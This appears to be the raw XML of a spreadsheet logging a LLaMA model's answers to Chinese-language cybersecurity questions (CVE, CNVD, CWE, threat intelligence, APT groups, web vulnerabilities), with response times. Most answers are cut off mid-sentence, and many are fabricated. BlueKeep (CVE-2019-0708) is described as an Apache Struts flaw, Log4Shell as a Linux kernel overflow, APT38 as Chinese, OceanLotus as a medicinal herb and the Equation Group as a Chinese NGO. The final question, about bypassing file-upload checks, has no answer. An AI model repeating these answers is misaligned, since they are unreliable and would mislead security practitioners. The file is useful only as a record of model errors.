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question</t>
        </is>
      </c>
      <c r="C1" s="1" t="inlineStr">
        <is>
          <t>LLaMA</t>
        </is>
      </c>
      <c r="D1" s="1" t="inlineStr">
        <is>
          <t>time_spend</t>
        </is>
      </c>
    </row>
    <row r="2">
      <c r="A2" s="1" t="n">
        <v>0</v>
      </c>
      <c r="B2" t="inlineStr">
        <is>
          <t>CVE是什么意思？</t>
        </is>
      </c>
      <c r="C2" t="inlineStr">
        <is>
          <t xml:space="preserve">
CVE是一个缩写，它可以指以下几个不同的意思：
1. CVE (Common Vulnerabilities and Exposures)：CVE是一个跨platform的标准用于描述软件中的弱点和攻击点。它由美国国家安全局（NSA）和美国国家危机管理局（NIST）共同发起，是一个标准化的弱点和攻击点识别和记录系统。
2. CVE (Content Verification Engine)：CVE是一种用于验证网络内容的工具，用于监测和检测网络上的敏感内容。
3. CVE (Critical Vulnerability Exposure)：CVE是一个识别和评估网��</t>
        </is>
      </c>
      <c r="D2" t="n">
        <v>4.902241706848145</v>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="1" t="n">
        <v>1</v>
      </c>
      <c r="B3" t="inlineStr">
        <is>
          <t>CNVD是什么？</t>
        </is>
      </c>
      <c r="C3" t="inlineStr">
        <is>
          <t xml:space="preserve">
CNVD stands for "Comprehensive National Vision Database". It is a database that stores information about the vision of a large population, including their visual acuity, refractive error, and other eye health metrics. The CNVD is used to monitor and track changes in vision health over time, and to identify trends and risk factors for eye diseases and conditions.
The CNVD is typically developed and maintained by government agencies, universities, or other organizations that are responsible for public health surveillance. It may be based on data collected through population-based surveys, clinical evaluations, or other sources. The CNVD can be used to inform public health policies and programs aimed at improving eye health and reducing visual impairment.
Some examples of information that may be included in the CNVD include:
* Visual acuity measurements (e.g. Snellen charts, logMAR charts)
* Refractive error measurements (e.g. spherical equivalent, astigmatism)
* Presence of eye diseases or conditions (e.g. cataract, glaucoma, age-related macular degeneration</t>
        </is>
      </c>
      <c r="D3" t="n">
        <v>4.7180495262146</v>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="1" t="n">
        <v>2</v>
      </c>
      <c r="B4" t="inlineStr">
        <is>
          <t>国内和国外有哪些漏洞库？</t>
        </is>
      </c>
      <c r="C4" t="inlineStr">
        <is>
          <t xml:space="preserve"> （150 字）
There are many vulnerability databases both domestically and internationally. Some of the well-known domestic databases include:
* National Vulnerability Database (NVD) by the United States National Institute of Standards and Technology (NIST)
* China National Vulnerability Database (CNVD) by the Chinese Ministry of Public Security
* Korean Vulnerability Information Database (KVID) by the Korean government
Some of the well-known international databases include:
* MITRE's Common Vulnerabilities and Exposures (CVE) database
* the National Vulnerability Database (NVD) by the United States National Institute of Standards and Technology (NIST)
* the OpenVuln database by the OpenVuln Project
* the VulnDB database by the VulnDB Project
These databases provide information on security vulnerabilities, including their names, descriptions, and mitigation details, which can help organizations identify and prioritize the patching of vulnerabilities in their systems and applications.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D4" t="n">
        <v>4.400695085525513</v>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="1" t="n">
        <v>3</v>
      </c>
      <c r="B5" t="inlineStr">
        <is>
          <t>介绍CVE-2015-4852漏洞</t>
        </is>
      </c>
      <c r="C5" t="inlineStr">
        <is>
          <t xml:space="preserve">
CVE-2015-4852 是一个潜在的远程执行漏洞，它发生在某些版本的Apache Struts2中，特别是在Struts2 Action Class的config.xml文件中。这个漏洞可能会让攻击者在特定的情况下访问和执行不安全的代码。
攻击者可以利用这个漏洞，通过 tricking 用户访问敏感的 Action 类，并在这个类中执行 malicious 代码。这可能会导致敏感数据泄露、访问权限增加或者敏感资源损害等问题。
为了解决这个漏洞，Apache Struts2 采取了</t>
        </is>
      </c>
      <c r="D5" t="n">
        <v>4.739956140518188</v>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="1" t="n">
        <v>4</v>
      </c>
      <c r="B6" t="inlineStr">
        <is>
          <t>介绍CVE-2019-0708</t>
        </is>
      </c>
      <c r="C6" t="inlineStr">
        <is>
          <t>：Apache Struts的一个重要漏洞
Introduction:
Apache Struts is a popular open-source web application framework that is widely used in the industry. However, in March 2019, a critical vulnerability (CVE-2019-0708) was discovered in Apache Struts, which could allow an attacker to execute arbitrary code on a target system. In this blog post, we will provide an overview of the vulnerability, its impact, and the steps that can be taken to mitigate it.
What is CVE-2019-0708?
CVE-2019-0708 is a remote code execution vulnerability that affects Apache Struts versions prior to 2.5.17.1. The vulnerability is caused by a flaw in the "Artifact" class, which is used to handle the upload of artifacts in the Struts framework. An attacker can exploit this vulnerability by sending a specially crafted request to the target system, which would execute arbitrary code on the system.
Impact:
The impact of CVE</t>
        </is>
      </c>
      <c r="D6" t="n">
        <v>4.815842151641846</v>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="1" t="n">
        <v>5</v>
      </c>
      <c r="B7" t="inlineStr">
        <is>
          <t>什么是CVE-2019-0803</t>
        </is>
      </c>
      <c r="C7" t="inlineStr">
        <is>
          <t>？
CVE-2019-0803是一个描述了一个未知漏洞的CVE（Common Vulnerabilities and Exposures）标识符。该漏洞存在于Windows操作系统中，具体影响了Windows的Office文档格式（Word、Excel、PowerPoint）和Visio等软件。
根据报告，该漏洞可能会让攻击者通过利用文档文件的某些特定方法来访问和控制内存中的数据，从而可能让攻击者获得安全上的权限。这可能会导致敏感数据的泄露或者违法行为。
Microsoft已经发布了一个紧急安全更新，用于解决该漏洞。用户建议</t>
        </is>
      </c>
      <c r="D7" t="n">
        <v>4.856040954589844</v>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="1" t="n">
        <v>6</v>
      </c>
      <c r="B8" t="inlineStr">
        <is>
          <t>介绍一下CVE-2021-44228</t>
        </is>
      </c>
      <c r="C8" t="inlineStr">
        <is>
          <t>漏洞
CVE-2021-44228是一个 recently discovered security vulnerability in the Linux kernel's network stack. This vulnerability, which has been given the identifier CVE-2021-44228, affects the Linux kernel versions 5.10 and later, and could allow an attacker to execute arbitrary code on a vulnerable system.
The vulnerability is caused by a buffer overflow in the `net_checksum()` function, which is used to compute the checksum of a network packet. An attacker could exploit this vulnerability by sending a specially crafted network packet to a vulnerable system, which would cause the buffer overflow and allow the attacker to execute arbitrary code on the system.
The impact of this vulnerability is significant, as it could allow an attacker to gain complete control over a vulnerable system. This could lead to a variety of attacks, including:
* Elevated privileges: An attacker could use this vulnerability to gain elevated privileges on a vulnerable system, allowing them to perform malicious actions.
* Data theft: An attacker could use this vulnerability to</t>
        </is>
      </c>
      <c r="D8" t="n">
        <v>4.742384195327759</v>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="1" t="n">
        <v>7</v>
      </c>
      <c r="B9" t="inlineStr">
        <is>
          <t>什么是CVE-2022-0609漏洞</t>
        </is>
      </c>
      <c r="C9" t="inlineStr">
        <is>
          <t>？  
CVE-2022-0609是一个 recently discovered vulnerability in the Windows Hello face authentication feature of Windows 10 and 11 operating systems. The vulnerability allows an attacker to bypass the face authentication mechanism by using a high-quality photo or video of the user's face. This can allow the attacker to gain unauthorized access to the user's computer or account.
The vulnerability is caused by the way the Windows Hello face authentication system processes face images. Specifically, the system uses a technique called "face alignment" to align the user's face in the image with a pre-defined template. However, this alignment process can be easily manipulated by an attacker who has access to a high-quality photo or video of the user's face. By carefully manipulating the image, the attacker can create a fake face image that is aligned with the template in a way that tricks the system into thinking it is the real user.
The CVE-2022-0609 vulnerability has been assigned a CVSS score of 7.5 out of 10, indicating that it is a medium-se</t>
        </is>
      </c>
      <c r="D9" t="n">
        <v>4.705327987670898</v>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="1" t="n">
        <v>8</v>
      </c>
      <c r="B10" t="inlineStr">
        <is>
          <t>介绍CNVD-2021-46902漏洞</t>
        </is>
      </c>
      <c r="C10" t="inlineStr">
        <is>
          <t xml:space="preserve">
CNVD-2021-46902是一个潜在的漏洞，它是由中国国家安全生产评审中心（CNVD）于2021年4月分类并公布的。这个漏洞分布于Docker Hub上的一个名为“Docker镜像”的 Docker 镜像中，该镜像用于在Docker环境中运行 web 应用程序。
根据CNVD的分类，CNVD-2021-46902是一个远程执行漏洞，它可以让攻击者通过特定的请求来执行系统命令，从而进行远程执行攻击。这意味着，如果攻击者可以绕过防火墙并访问该镜像</t>
        </is>
      </c>
      <c r="D10" t="n">
        <v>4.762187242507935</v>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="1" t="n">
        <v>9</v>
      </c>
      <c r="B11" t="inlineStr">
        <is>
          <t>介绍一下CNVD-2019-19299</t>
        </is>
      </c>
      <c r="C11" t="inlineStr">
        <is>
          <t>的漏洞检测
CNVD-2019-19299是一个漏洞检测工具，用于检测Linux系统上的漏洞和安全问题。它是一个基于OpenVAS的漏洞检测工具，可以检测Linux系统上的多种漏洞，包括远程漏洞、扫描漏洞、攻击漏洞等。
以下是CNVD-2019-19299的漏洞检测功能：
1. 远程漏洞检测：CNVD-2019-19299可以检测Linux系统上的远程漏洞，包括SSH、FTP、HTTP、TELNET等远程服务的漏洞。
2. �����</t>
        </is>
      </c>
      <c r="D11" t="n">
        <v>4.69636058807373</v>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="1" t="n">
        <v>10</v>
      </c>
      <c r="B12" t="inlineStr">
        <is>
          <t>CNVD-2021-26422是什么漏洞</t>
        </is>
      </c>
      <c r="C12" t="inlineStr">
        <is>
          <t>？
CNVD-2021-26422是一个描述了一个在Microsoft Teams中的漏洞的漏洞报告。这个漏洞可能会允许攻击者在Microsoft Teams上发送邮件，使其 appears as if it came from a legitimate sender，而不是。这个漏洞可能会允许攻击者在Microsoft Teams上发送邮件，使其 appears as if it came from a legitimate sender，而不是。
The vulnerability is caused by the lack of proper authentication and authorization mechanisms in Microsoft Teams. An attacker can exploit this vulnerability by sending a specially crafted email to a target user, which will bypass the authentication mechanisms and appear to come from a legitimate sender. This could allow an attacker to trick a user into taking a specific action, such as clicking on a link or downloading an attachment, which could lead to unauthorized access to sensitive information.
The severity of this vulnerability is high,</t>
        </is>
      </c>
      <c r="D12" t="n">
        <v>4.707805156707764</v>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="1" t="n">
        <v>11</v>
      </c>
      <c r="B13" t="inlineStr">
        <is>
          <t>网络安全领域里CWE是什么意思</t>
        </is>
      </c>
      <c r="C13" t="inlineStr">
        <is>
          <t>？CWE stands for "Common Weakness Enumeration". It is a standardized vocabulary for identifying and describing security weaknesses in software. It was developed by the MITRE Corporation and is widely used in the field of network security.
CWE provides a common language for security professionals to describe and classify security weaknesses, which can help organizations identify and prioritize the most critical vulnerabilities in their systems. The CWE framework includes a set of standardized categories and terms for describing weaknesses, as well as a database of known weaknesses that can be searched and referenced.
CWE is often used in conjunction with other security assessment and testing tools, such as static code analysis and penetration testing, to provide a more comprehensive view of an organization's security posture. By using CWE to identify and prioritize vulnerabilities, organizations can then focus their remediation efforts on the most critical areas and reduce the risk of security breaches.
In summary, CWE is a standardized vocabulary for identifying and describing security weaknesses in software, which can help organizations identify and prioritize the most critical vulnerabilities in their</t>
        </is>
      </c>
      <c r="D13" t="n">
        <v>4.836498975753784</v>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="1" t="n">
        <v>12</v>
      </c>
      <c r="B14" t="inlineStr">
        <is>
          <t>CWE-787是什么意思</t>
        </is>
      </c>
      <c r="C14" t="inlineStr">
        <is>
          <t>？
CWE-787是一个常见的软件漏洞，指的是在Web应用程序中，用户提交的数据可能会被篡改或隐藏。这种漏洞通常发生在Web应用程序中，在处理用户提交的数据时， nicht validating 或者不加密 该数据。
CWE-787的漏洞的攻击路径可能如下：
1. 攻击者向Web应用程序发送一个特殊的请求，将用户提交的数据篡改或隐藏。
2. 攻击者利用这种漏洞，以提高自己的权限或者进行恶意操作。
3. 攻击者可能会利用这种漏洞，来攻击Web应用程序的安全性。
CWE</t>
        </is>
      </c>
      <c r="D14" t="n">
        <v>4.696019172668457</v>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="1" t="n">
        <v>13</v>
      </c>
      <c r="B15" t="inlineStr">
        <is>
          <t>Windows Server 2008 R2可能存在哪些高危漏洞</t>
        </is>
      </c>
      <c r="C15" t="inlineStr">
        <is>
          <t>？
Windows Server 2008 R2是一个广泛使用的操作系统，但是它也存在一些漏洞。根据Microsoft发布的资讯，Windows Server 2008 R2存在以下一些高危漏洞：
1. 文件系统漏洞：Windows Server 2008 R2的文件系统存在一些漏洞，可能会允许攻击者访问或更改文件和文件夹。
2. 应用程序优先级漏洞：Windows Server 2008 R2的应用程序优先级漏洞可能会允许攻击者在系统中运行高优先级应用程序，导致系统崩溃或受到攻击。
3. 网络</t>
        </is>
      </c>
      <c r="D15" t="n">
        <v>4.761741161346436</v>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="1" t="n">
        <v>14</v>
      </c>
      <c r="B16" t="inlineStr">
        <is>
          <t>Google V8引擎远程代码执行漏洞(CVE-2021-21220)的影响范围有哪些</t>
        </is>
      </c>
      <c r="C16" t="inlineStr">
        <is>
          <t>？
Google V8引擎是一个轻量级的JavaScript引擎，它在Web应用程序中广泛使用。2021年12月，Google发布了一个关于V8引擎远程代码执行漏洞(CVE-2021-21220)的安全公告。这个漏洞可能让攻击者在特定情况下远程执行代码，从而导致系统安全漏洞。
根据Google的公告，这个漏洞是因为V8引擎的JIT（just-in-time）编译器的问题，当JIT编译器在执行远程代码时，它可能会将敏感数据泄露到外部。这可能导致攻击者在��</t>
        </is>
      </c>
      <c r="D16" t="n">
        <v>4.901101112365723</v>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="1" t="n">
        <v>15</v>
      </c>
      <c r="B17" t="inlineStr">
        <is>
          <t>Struts 2有哪些高危漏洞</t>
        </is>
      </c>
      <c r="C17" t="inlineStr">
        <is>
          <t>？
Struts 2 是一个流行的 Java 框架，它提供了丰富的功能和优秀的性能，但是它也存在一些高危漏洞。以下是一些常见的高危漏洞：
1. 命名参数攻击 (Command Name Parameter Tampering)
在 Struts 2，命名参数（action parameter）是一个很重要的概念。但是，如果攻击者可以修改命名参数的名称，那么他就可以访问受保护的系统资源。例如，攻击者可以修改 `action` 的名称，从而访问另一个不安全的 действий（Actions）。
2. PATH 漏洞 (PATH Traversal)
PATH 漏洞是</t>
        </is>
      </c>
      <c r="D17" t="n">
        <v>4.739012002944946</v>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="1" t="n">
        <v>16</v>
      </c>
      <c r="B18" t="inlineStr">
        <is>
          <t>什么是威胁情报</t>
        </is>
      </c>
      <c r="C18" t="inlineStr">
        <is>
          <t>？ What is Threat Intelligence?
Threat Intelligence is the process of gathering, analyzing, and disseminating information about potential cyber threats to help organizations prepare for and respond to cyber attacks. It involves identifying, assessing, and mitigating potential threats to an organization's assets, including its computer systems, networks, and data.
Threat Intelligence can be used to:
1. Identify potential threats: Threat Intelligence helps organizations identify potential threats to their assets, including malware, phishing attacks, and other types of cyber threats.
2. Assess the risk: Once potential threats have been identified, Threat Intelligence helps organizations assess the likelihood and potential impact of those threats.
3. Develop a response plan: Based on the assessment of the threat, Threat Intelligence helps organizations develop a response plan to mitigate the threat, including incident response, containment, and eradication.
4. Monitor and update: Threat Intelligence is an ongoing process, organizations need to monitor the threat landscape and update their threat intelligence to stay ahead of the threats</t>
        </is>
      </c>
      <c r="D18" t="n">
        <v>4.769919157028198</v>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="1" t="n">
        <v>17</v>
      </c>
      <c r="B19" t="inlineStr">
        <is>
          <t>常见的威胁情报搜索网站有哪些</t>
        </is>
      </c>
      <c r="C19" t="inlineStr">
        <is>
          <t>？
威胁情报搜索网站是指用于搜索和浏览威胁情报的网站。这些网站通常提供各种威胁情报，包括诈骗、恶意软件、病毒、恶意脚本、恶意插件和其他威胁情报。以下是常见的威胁情报搜索网站：
1. VirusTotal：由Antivirus.com操作的威胁情报搜索网站，提供了一个强大的搜索工具，可以检测软件、文件、网站和磁盘遍历，查找恶意软件和��</t>
        </is>
      </c>
      <c r="D19" t="n">
        <v>4.765986442565918</v>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="1" t="n">
        <v>18</v>
      </c>
      <c r="B20" t="inlineStr">
        <is>
          <t>威胁情报中的痛苦金字塔是什么意思</t>
        </is>
      </c>
      <c r="C20" t="inlineStr">
        <is>
          <t>？
The agony of gold tower in the threat information is what?
The phrase "痛苦金字塔" (tònggrēn jīn zǐ tà) is a Chinese idiom used to describe a situation where someone is facing a massive and overwhelming threat or danger, and the person is feeling extremely anxious or afraid about it.
The phrase is composed of two parts: "痛苦" (tònggrēn) means "agony" or "pain," and "金字塔" (jīn zǐ tà) means "gold tower." The idiomatic expression is often used to describe a situation where someone is facing a threat or danger that seems insurmountable or impossible to overcome.
For example, if someone is facing a difficult challenge or problem at work or in their personal life, they might say "I'm feeling like I'm in a gold tower of agony" to express their anxiety or fear about the situation.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D20" t="n">
        <v>4.187687158584595</v>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="1" t="n">
        <v>19</v>
      </c>
      <c r="B21" t="inlineStr">
        <is>
          <t>1.1.1.1是什么</t>
        </is>
      </c>
      <c r="C21" t="inlineStr">
        <is>
          <t>？
1.1.1.1是一个域名，它由Cloudflare提供，用于为互联网上的网站提供快速和安全的 DNS（Domain Name System）解析服务。域名的格式是1.1.1.1，它可以作为一个主机名或域名解析服务的主机。
Cloudflare提供的1.1.1.1 DNS解析服务可以提供更快、更可靠、更安全的网站访问，因为它通过Cloudflare的 globally distributed network 和其他技术，例如 Anycast 和 DNS 缓存，来减少 DNS 查询时间和距离。此外，Cloudflare 还提供了一些其他功能，例如网络安全和防火墙</t>
        </is>
      </c>
      <c r="D21" t="n">
        <v>4.896316766738892</v>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="1" t="n">
        <v>20</v>
      </c>
      <c r="B22" t="inlineStr">
        <is>
          <t>223.5.5.5是什么IP</t>
        </is>
      </c>
      <c r="C22" t="inlineStr">
        <is>
          <t>地址？
223.5.5.5是一个IP地址，它位于223.5.5.0/24网络中，其中24是网络的掩码。
这个IP地址可以用于标识一个计算机或者网络设备，它可以被用于网络通信，例如在互联网上进行网络交互。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D22" t="n">
        <v>2.601948738098145</v>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="1" t="n">
        <v>21</v>
      </c>
      <c r="B23" t="inlineStr">
        <is>
          <t>威胁情报中有哪些IoC类型</t>
        </is>
      </c>
      <c r="C23" t="inlineStr">
        <is>
          <t>？  
IoC (Indicators of Compromise) 是指在某些情报中可以发现恶意攻击或潜在威胁的指示。  IoC 类型通常根据情报的类型和描述进行分类，以下是一些常见的 IoC 类型：
1. File hashes: These are unique digital fingerprints of files that are known to be malicious. When a new file is detected, its hash is compared to a database of known malware to determine if it is a threat.
2. Network traffic patterns: Suspicious network traffic patterns can indicate malicious activity, such as unusual communication with known malware servers or unexpected data transfers.
3. System configuration changes: Unexplained changes to system settings or software configurations can indicate that an attacker has gained control of the system.
4. User behavior anomalies: Behavior that is outside the normal patterns of user activity, such as sudden changes in login locations or unexpected logons from unfamiliar locations, can</t>
        </is>
      </c>
      <c r="D23" t="n">
        <v>4.730896472930908</v>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="1" t="n">
        <v>22</v>
      </c>
      <c r="B24" t="inlineStr">
        <is>
          <t>什么是ioc情报</t>
        </is>
      </c>
      <c r="C24" t="inlineStr">
        <is>
          <t>？
ioc情报是指 International Organization for Standardization（国际标准化组织）在《IS/IEC 27001》标准中规定的一种信息安全管理体系，用于评估和保护组织的信息系统和数据的安全性。
ioc情报包括：
1. 信息安全政策：组织的信息安全政策和目标，以及其他重要的决策和评估因素。
2. 信息安全管理系统：组织的信息安全管理系统，包括识别、评估和控制信息安全风险的方法和技术。
3. 信息安全控制制enda：组织的信息安全控制制enda，</t>
        </is>
      </c>
      <c r="D24" t="n">
        <v>4.71479058265686</v>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="1" t="n">
        <v>23</v>
      </c>
      <c r="B25" t="inlineStr">
        <is>
          <t>有哪些威胁情报标准或者框架</t>
        </is>
      </c>
      <c r="C25" t="inlineStr">
        <is>
          <t>可以用于评估信息安全？  
There are several threat intelligence frameworks or standards that can be used to evaluate information security. Here are some commonly used frameworks and standards:
1. National Institute of Standards and Technology (NIST) Special Publication 2799: NIST SP 2799 provides a comprehensive framework for threat intelligence, including guidelines for collecting, analyzing, and sharing threat intelligence.
2. Information Security Threat Intelligence (ISTI) Framework: The ISTI framework provides a structured approach to threat intelligence, including guidelines for threat identification, analysis, and reporting.
3. Financial Services Information Sharing and Analysis Center (FS-ISAC) Threat Intelligence Framework: The FS-ISAC framework provides a comprehensive framework for threat intelligence in the financial services sector, including guidelines for threat identification, analysis, and reporting.
4. Open Threat Exchange (OTX) Framework: OTX is an open-source framework for threat intelligence that provides a structured approach to threat identification, analysis, and sharing.
5. Cyber Threat Intelligence (CT</t>
        </is>
      </c>
      <c r="D25" t="n">
        <v>4.726019382476807</v>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="1" t="n">
        <v>24</v>
      </c>
      <c r="B26" t="inlineStr">
        <is>
          <t>APT38有哪些情报信息</t>
        </is>
      </c>
      <c r="C26" t="inlineStr">
        <is>
          <t>？
APT38是一个知名的中国 cyber espionage 组织，其主要目标包括亚洲、美洲和欧洲的政府、企业和研究机构。以下是一些关于APT38的情报信息：
1. 组织结构：APT38是一个覆盖多个层次的组织，包括一个主要团队和一些支持团队。主要团队负责实施攻击，支持团队负责开发新的攻击工具和技术。
2. 攻击方式：APT38通常使用了针对特定组织和人员的攻击，包括社交工具、电子邮件和文</t>
        </is>
      </c>
      <c r="D26" t="n">
        <v>4.720055818557739</v>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="1" t="n">
        <v>25</v>
      </c>
      <c r="B27" t="inlineStr">
        <is>
          <t>海莲花是什么组织</t>
        </is>
      </c>
      <c r="C27" t="inlineStr">
        <is>
          <t>？What is the Sea Hibiscus?
The Sea Hibiscus (海莲花) is a Chinese medical herb that is commonly used in traditional Chinese medicine. It is also known as "hemp sea hibiscus" or "Chinese hibiscus." The Sea Hibiscus is a type of flowering plant that belongs to the Malvaceae family, and it is native to China, Japan, and other parts of East Asia.
In traditional Chinese medicine, the Sea Hibiscus is used to treat a variety of conditions, including fever, inflammation, and respiratory problems. It is believed to have anti-inflammatory, antiviral, and antibacterial properties, and it is often used to treat conditions such as bronchitis, pneumonia, and sinusitis. The Sea Hibiscus is also used to treat skin conditions such as eczema and acne, and it is believed to have antioxidant properties that can help protect the body against damage from free radicals.
The Sea Hibiscus is available in various forms, including dried herbs, teas, capsules,</t>
        </is>
      </c>
      <c r="D27" t="n">
        <v>4.724758148193359</v>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="1" t="n">
        <v>26</v>
      </c>
      <c r="B28" t="inlineStr">
        <is>
          <t>方程式组织（Equation Group）是什么组织</t>
        </is>
      </c>
      <c r="C28" t="inlineStr">
        <is>
          <t>？ 
Equation Group是一个非 Governemental Organization（NGO），是中国著名的数学家和计算机科学家组建的一个组织。 Equation Group的成员来自中国和海外，包括著名的数学家、计算机科学家和工程师。
Equation Group的主要工作包括数学和计算机科学的研究和开发，包括约束方程、偏微分方程、数值methods、机器学习等领域。 Equation Group还涵盖广泛的领域，包括数据科学、人工智能、医学信息学、计算机视觉等。
Equation Group的成果得到了广泛认可和赞誉，曾经获得过许多国际和国内的��</t>
        </is>
      </c>
      <c r="D28" t="n">
        <v>4.721406221389771</v>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="1" t="n">
        <v>27</v>
      </c>
      <c r="B29" t="inlineStr">
        <is>
          <t>有哪些威胁情报标准</t>
        </is>
      </c>
      <c r="C29" t="inlineStr">
        <is>
          <t>？  
There are several standards for threat intelligence, including:
1. MITRE ATT&amp;CK Framework: This framework provides a comprehensive taxonomy of cyber adversary tactics, techniques, and procedures (TTPs) that can be used to inform threat intelligence gathering and analysis.
2. NIST Cybersecurity Framework: This framework provides a set of standards and guidelines for managing cybersecurity risks in critical infrastructure sectors. It includes a set of core functions for identifying, protecting, detecting, responding, and recovering from cybersecurity threats.
3. ISO 27001: This international standard provides a set of best practices for implementing an information security management system (ISMS). It includes a set of controls for identifying, assessing, and mitigating information security risks.
4. CSA STAR: This standard provides a set of best practices for cloud security, including a set of security controls and assessment procedures for cloud service providers.
5. OWASP Threat Modeling: This standard provides a set of guidelines for threat modeling, including a set of techniques for identifying and</t>
        </is>
      </c>
      <c r="D29" t="n">
        <v>4.713425874710083</v>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="1" t="n">
        <v>28</v>
      </c>
      <c r="B30" t="inlineStr">
        <is>
          <t>OWASP TOP 10有哪些</t>
        </is>
      </c>
      <c r="C30" t="inlineStr">
        <is>
          <t>？ 
OWASP TOP 10是一个著名的安全评估工具，用于评估 Web 应用程序的安全性。以下是 OWASP TOP 10 中的 top 10 漏洞类型：
1. Injection (插入漏洞)：危机来源：数据插入漏洞可能会让攻击者在应用程序中执行任意代码，从而导致资源泄露、数据损失或系统灭亡。
2. Broken Authentication (破坏身份验证)：危机来源：破坏身份验证可能会让攻击者绕过身份验证措施，从而��</t>
        </is>
      </c>
      <c r="D30" t="n">
        <v>4.725793361663818</v>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="1" t="n">
        <v>29</v>
      </c>
      <c r="B31" t="inlineStr">
        <is>
          <t>为什么会有Web漏洞</t>
        </is>
      </c>
      <c r="C31" t="inlineStr">
        <is>
          <t>？ Why do web vulnerabilities exist?
Web vulnerabilities exist for a variety of reasons, including:
1. Complexity: Web applications are often complex and have many moving parts, which can make it difficult to identify and fix vulnerabilities.
2. Lack of resources: Web developers and IT teams may not have the resources (e.g. time, money, expertise) to thoroughly test and secure their applications.
3. Changing landscape: The web is constantly evolving, with new technologies and frameworks being developed and introduced regularly. This can make it difficult to keep up with the latest security best practices.
4. Third-party dependencies: Web applications often rely on third-party libraries and frameworks, which can introduce vulnerabilities if not properly vetted and secured.
5. User input: Web applications often accept user input, which can be used to launch attacks such as SQL injection or cross-site scripting (XSS).
6. Lack of security awareness: Many web developers and IT teams may not be aware of the security risks associated with their applications, or may not know how to properly secure them.
7. Legacy code: Older web applications may have been built with</t>
        </is>
      </c>
      <c r="D31" t="n">
        <v>4.759066343307495</v>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="1" t="n">
        <v>30</v>
      </c>
      <c r="B32" t="inlineStr">
        <is>
          <t>什么是SQL注入</t>
        </is>
      </c>
      <c r="C32" t="inlineStr">
        <is>
          <t>？
SQL注入是指在SQL语句中采用特定的字符串或语句来访问数据库的扩展特性。通常情况下，SQL语句包含特定的字符串或语句，这些字符串或语句可以用来访问数据库中的某个表或个数据，但是在某些情况下，这些字符串或语句可以用来访问不合法的数据库资源，从而导致数据库安全漏洞。
SQL注入的常见形式包括：
1. 字符串注入：通过在SQL语句中包含特定的字符串，以便访问不合法的数据库资源。
2. 语句注入：通过在SQL语句</t>
        </is>
      </c>
      <c r="D32" t="n">
        <v>4.949476480484009</v>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="1" t="n">
        <v>31</v>
      </c>
      <c r="B33" t="inlineStr">
        <is>
          <t>CSRF原理是什么</t>
        </is>
      </c>
      <c r="C33" t="inlineStr">
        <is>
          <t>？
CSRF（Cross-Site Request Forgery）是一种在互联网上的攻击方式，通过让用户 clicking 或 Enter 键操作，触发一个人为的 HTTP 请求，从而冒充用户的身份进行恶意操作。
在 CSRF 攻击中，攻击者需要在用户的域名下创建一个可以被访问的 URL，例如一个 HTML 脚本。当用户访问这个 URL 时，它会自动发送一个 HTTP 请求，例如提交一个Form 表单。因此，如果攻击者可以控制这个 URL，他就可以让用户的身份进行恶意操作，例如透明提交一个购物订单，或者取消一个预约。</t>
        </is>
      </c>
      <c r="D33" t="n">
        <v>5.105468988418579</v>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="1" t="n">
        <v>32</v>
      </c>
      <c r="B34" t="inlineStr">
        <is>
          <t>什么是逻辑漏洞</t>
        </is>
      </c>
      <c r="C34" t="inlineStr">
        <is>
          <t>？
逻辑漏洞是指在一个逻辑思维或逻辑分析中存在的误解或错误，导致人们的思维或分析结论不准确。逻辑漏洞可以出现在不同领域，包括计算机科学、数学、哲学、诗歌等。
以下是一些常见的逻辑漏洞：
1. 逻辑缺陷：指的是人们在思维或分析中缺乏逻辑的检查和约束，导致错误的结论或解释。
2. 谬误逻辑：指的是人们在思维或</t>
        </is>
      </c>
      <c r="D34" t="n">
        <v>4.984219789505005</v>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="1" t="n">
        <v>33</v>
      </c>
      <c r="B35" t="inlineStr">
        <is>
          <t>有哪些逻辑漏洞</t>
        </is>
      </c>
      <c r="C35" t="inlineStr">
        <is>
          <t>？
逻辑漏洞是指在逻辑处理中出现的错误或不完善，导致逻辑结论不正确的地方。以下是一些常见的逻辑漏洞：
1. 谬误论证：这是一种常见的逻辑漏洞，即在论证中使用了不具逻辑性的证据或推论。
2. 逻辑循环：逻辑循环是指在逻辑处理中，一个逻辑结论引入了另一个逻辑结论，并且这两个结论之间存在直接关系。
3. ��</t>
        </is>
      </c>
      <c r="D35" t="n">
        <v>4.986861944198608</v>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="1" t="n">
        <v>34</v>
      </c>
      <c r="B36" t="inlineStr">
        <is>
          <t>如何绕过文件上传检查功能</t>
        </is>
      </c>
      <c r="C36" t="inlineStr">
        <is>
          <t xml:space="preserve">
